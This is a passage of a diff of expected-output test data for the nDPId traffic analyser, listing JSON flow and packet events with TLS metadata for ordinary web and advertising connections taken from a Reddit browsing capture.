-01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9434,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9436,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691004,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691004,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9359,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690994,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690994,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9373,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690996,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9391,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690998,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9417,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9427,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691002,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9434,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9436,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691004,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691004,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9475,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1605291691029,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291691029,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQbO1037mLrsxooBJXgErvAAACBAV4AQMDAwQCCArC10wIuJU7dg=="} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9476,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1605291691029,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":74,"pkt_l4_len":20,"thread_ts_msec":1605291691029,"pkt":"qtsDr8lk5EKm5WPyht1gBfK\/ABQGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGwBu4uuzGgAAAAAUAQAANo6AAA="} 00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11226,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291696948,"flow_last_seen":1605291696948,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291696948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11226,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1605291696948,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291696948,"pkt":"qtsDr8lk5EKm5WPyht1gDNdJACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA006zst54Bu3jHKBQAAAAAoAL9IL45AAACBAWgBAIIClIhuaMAAAAAAQMDBw=="} 
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11227,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1605291696965,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291696965,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAADTTrOwqAcsBIEmLB5kd7IUo3\/YpAbu3nh9OKxV4xygVoBJXgPOCAAACBAV4AQMDAwQCCArC12M3UiG5ow=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11228,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1605291696965,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291696965,"pkt":"qtsDr8lk5EKm5WPyht1gDNdJACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA006zst54Bu3jHKBUfTisWgBAB+3eDAAABAQgKUiG5tMLXYzc="} -00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11229,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291696948,"flow_last_seen":1605291696965,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291696965,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11233,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291696948,"flow_last_seen":1605291697033,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291697033,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11239,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291696948,"flow_last_seen":1605291697034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6001,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1605291697034,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","server_names":"tag.device9.com,www.tag.device9.com,fp.zenaps.com,the.sciencebehindecommerce.com,d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=tag.device9.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"8B:5C:A4:62:70:92:3A:09:C3:72:49:B2:A2:22:32:16:22:87:9D:F3"}} -00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1605291688749,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":10966,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605291690384,"flow_last_seen":1605291690520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6642,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":782,"flow_first_seen":1605291687514,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6288,"flow_tot_l4_payload_len":596288,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} 
-00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1605291690926,"flow_last_seen":1605291691284,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2470,"flow_tot_l4_payload_len":37085,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
-00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291690926,"flow_last_seen":1605291691064,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":200,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691062,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3816,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
+00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11229,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291696948,"flow_last_seen":1605291696965,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291696965,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11233,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291696948,"flow_last_seen":1605291697033,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291697033,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11239,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291696948,"flow_last_seen":1605291697034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6001,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1605291697034,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 